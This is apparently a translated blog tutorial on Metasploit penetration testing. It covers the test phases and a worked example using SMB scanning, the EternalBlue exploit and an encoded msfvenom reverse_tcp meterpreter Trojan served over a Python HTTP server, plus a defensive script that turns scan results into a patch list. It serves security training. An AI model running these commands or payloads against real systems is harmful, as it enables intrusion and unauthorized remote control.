Msfconsole exploit process

# 1. Phase division:

The exploitation process is divided into the following stages: pre-engagement interaction, intelligence gathering, threat modeling, vulnerability analysis, exploitation, post-exploitation, and reporting.

## 1. Pre-engagement interaction:

Discuss the engagement with the client organization to determine its scope, goals, and so on.

This stage comes before intelligence gathering; its purpose is to confirm the targets and the agreed scope.

## 2. Intelligence gathering stage:

Collect as much information about the target organization as possible:

- Peripheral information search: Google
- Host discovery and port scanning: Nmap
- Service scanning: use the service scanning modules under auxiliary/scanner/ in Metasploit to identify service versions and other details on the target machine
- Network vulnerability scanning: OpenVAS, Nessus, etc.
- Other tools: custom Python scanning scripts

## 3. Threat modeling phase:

Sort through the clues and determine the most feasible exploitation path. The documents written in this modeling stage are not for yourself but for the whole team, so that several people can cooperate.

This stage mainly organizes the collected information and clarifies the plan for exploiting the vulnerability.

## 4. Vulnerability analysis stage:

Search for usable exploit code and resources.

This stage mainly selects and matches candidate exploit modules and shellcode.

## 5. Exploitation stage:

Find the security hole and break into the system.

At this stage, attempt to exploit the vulnerability: configure the listener (handler) and launch the exploit.

## 6. Post-exploitation stage:

Meterpreter; carry out post-exploitation operations.

At this stage, operations such as downloading relevant data, maintaining access through a backdoor, and privilege escalation are carried out.

## 7. Report phase:

Penetration test report.

This stage summarizes the penetration test. The overview generally covers time, personnel, scope, technical means and so on: the time frame of the test, the personnel involved and their contact information, the agreed scope, and descriptions of the techniques and tools used. Clearly write up the pre-engagement interaction, intelligence gathering, threat modeling, vulnerability analysis, exploitation, post-exploitation, exploitation results, security recommendations, etc.

When writing, pay special attention to the following: the description of the vulnerability must not be too brief or glossed over in a single sentence; in the security recommendations section, avoid suggestions with no practical value, such as "strengthen security awareness"; and avoid a chaotic report structure and excessive jargon, such as "bypassing the dog" (slang for evading a WAF) or "X station".

# 2. Actual operation (example)

The host range and target have already been identified.

## 1. Intelligence gathering

Discover live hosts on the intranet with msf.

Searching for modules: enter `search scanner type:auxiliary` in the msf console.

Modules that can be used to discover hosts:

```
auxiliary/scanner/discovery/arp_sweep   # discover live hosts on the intranet via ARP
auxiliary/scanner/discovery/udp_sweep   # discover live hosts on the intranet via UDP
auxiliary/scanner/ftp/ftp_version       # discover FTP services
auxiliary/scanner/http/http_version     # discover HTTP services
auxiliary/scanner/smb/smb_version       # discover live hosts on the intranet via SMB
```

Other ways of discovering live hosts on the intranet:

- via NetBIOS
- via SNMP
- via ICMP

## 2. Threat modeling

---

After the first step, intelligence gathering, we discovered the target machine's IP through ARP.

Then, by scanning the target's IP, we learned that it has port 80 open (a web service), FTP open (a file service), and SMB open.

We finally decided to exploit SMB-related vulnerabilities.

The alternative is to get in by planting a Trojan horse.

---

## 3. Vulnerability analysis

First, check for SMB vulnerabilities that can be exploited, such as EternalBlue.

1. Query the msf modules related to EternalBlue with the command `search ms17_010`.

2. Use the EternalBlue scanning module: `use auxiliary/scanner/smb/smb_ms17_010`

3. Enter `options` to view the parameters the scanning module needs configured.

   3.1 Configure rhosts (the target host IP): `set rhosts <target ip>`

4. Enter `run` to perform the scan.

Hosts that are potentially vulnerable are reported.
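As an added defender-side example (not code from the original post), the following Python script pulls the hosts that auxiliary/scanner/smb/smb_ms17_010 reported as likely vulnerable out of a saved msfconsole transcript, so the list can be handed to patch management. The exact scanner output wording is assumed, and the transcript is constructed.

```python
"""Triage helper: extract hosts flagged by auxiliary/scanner/smb/smb_ms17_010
from a saved msfconsole transcript and build a remediation list.

The line formats matched below are assumed from typical scanner output;
the sample transcript is constructed for this example."""
import re

# Assumed shape: "[+] 10.0.0.5:445  - Host is likely VULNERABLE to MS17-010! - <OS banner>"
VULN_RE = re.compile(
    r"^\[\+\]\s+(?P<host>\d{1,3}(?:\.\d{1,3}){3}):(?P<port>\d+)\s+-\s+"
    r"Host is likely VULNERABLE to MS17-010!(?:\s+-\s+(?P<os>.*))?$"
)
# Assumed shape: "[-] 10.0.0.6:445  - Host does NOT appear vulnerable."
SAFE_RE = re.compile(
    r"^\[-\]\s+(?P<host>\d{1,3}(?:\.\d{1,3}){3}):(?P<port>\d+)\s+-\s+"
    r"Host does NOT appear vulnerable"
)

# Constructed sample transcript (hosts and banners are made up).
SAMPLE_TRANSCRIPT = """\
[*] 192.168.3.0/24:445 - Scanned  26 of 256 hosts (10% complete)
[+] 192.168.3.10:445      - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[-] 192.168.3.11:445      - Host does NOT appear vulnerable.
[+] 192.168.3.12:445      - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.3.0/24:445 - Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
"""


def triage(transcript: str) -> dict:
    """Return {'vulnerable': {host: os_banner}, 'not_vulnerable': [host, ...]}."""
    result = {"vulnerable": {}, "not_vulnerable": []}
    for raw in transcript.splitlines():
        line = raw.strip()
        m = VULN_RE.match(line)
        if m:
            result["vulnerable"][m["host"]] = (m["os"] or "").strip()
            continue
        m = SAFE_RE.match(line)
        if m:
            result["not_vulnerable"].append(m["host"])
    return result


def remediation_list(transcript: str) -> list:
    """Sorted (host, os_banner) pairs that still need the MS17-010 patch."""
    return sorted(triage(transcript)["vulnerable"].items())


if __name__ == "__main__":
    for host, banner in remediation_list(SAMPLE_TRANSCRIPT):
        print(f"{host}\t{banner}")
```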

## 4. Exploitation

---

1. Load the EternalBlue exploit module: `use exploit/windows/smb/ms17_010_eternalblue`

2. Enter `options` to view the parameters the exploit module needs configured.

3. Configure the parameters:

   3.1 rhosts (the target host IP): `set rhosts <target ip>`

   3.2 lhost (the listening host, i.e. the attacking machine's IP): `set lhost <attacker ip>`

   3.3 lport (the listening port): `set lport <port>`

   Note that the port must not already be in use.

4. Enter `run` to launch the EternalBlue exploit.

But it failed: the module ran but did not return a session.

![image.png](10-11 msfconsole exploit process.assets/bffdb79061ad4b0aa92d2dfde83e9f1b.png)

## 4.1 Alternative: exploitation by planting a Trojan horse

---

1. We know the target is a Windows system, so use msfvenom to generate a Windows Trojan (`-e` selects the encoder, `-b` the bytes to avoid, `-i` the number of encoding iterations):

```
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.3.33 LPORT=4446 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 10 -f exe -o payload.exe
```

2. After the payload is generated, deliver it to the target by starting a Python HTTP server on the attacking machine (the target downloads the file from it):

```
python -m SimpleHTTPServer 80
```

   `SimpleHTTPServer` is the Python 2 module; the Python 3 equivalent is `python3 -m http.server 80`.

3. Configure the listener: `use exploit/multi/handler`

4. Enter `options` to view the configuration:

   4.1 lhost (the listening host, i.e. the attacking machine's IP): `set lhost <attacker ip>`

   4.2 lport (the listening port): `set lport <port>`

   Note that the port must be the same as the LPORT used when generating the Trojan with msfvenom (4446 in the command above).

5. Configure the payload: `set payload windows/meterpreter/reverse_tcp`

6. Run `exploit` and wait for the target machine to execute the Trojan.

7. Once the target executes the Trojan, the exploit succeeds and a meterpreter session is obtained.

---

## 5. Post-exploitation

See the separate document.

## 6. Reporting phase


Origin blog.csdn.net/hmysn/article/details/128411068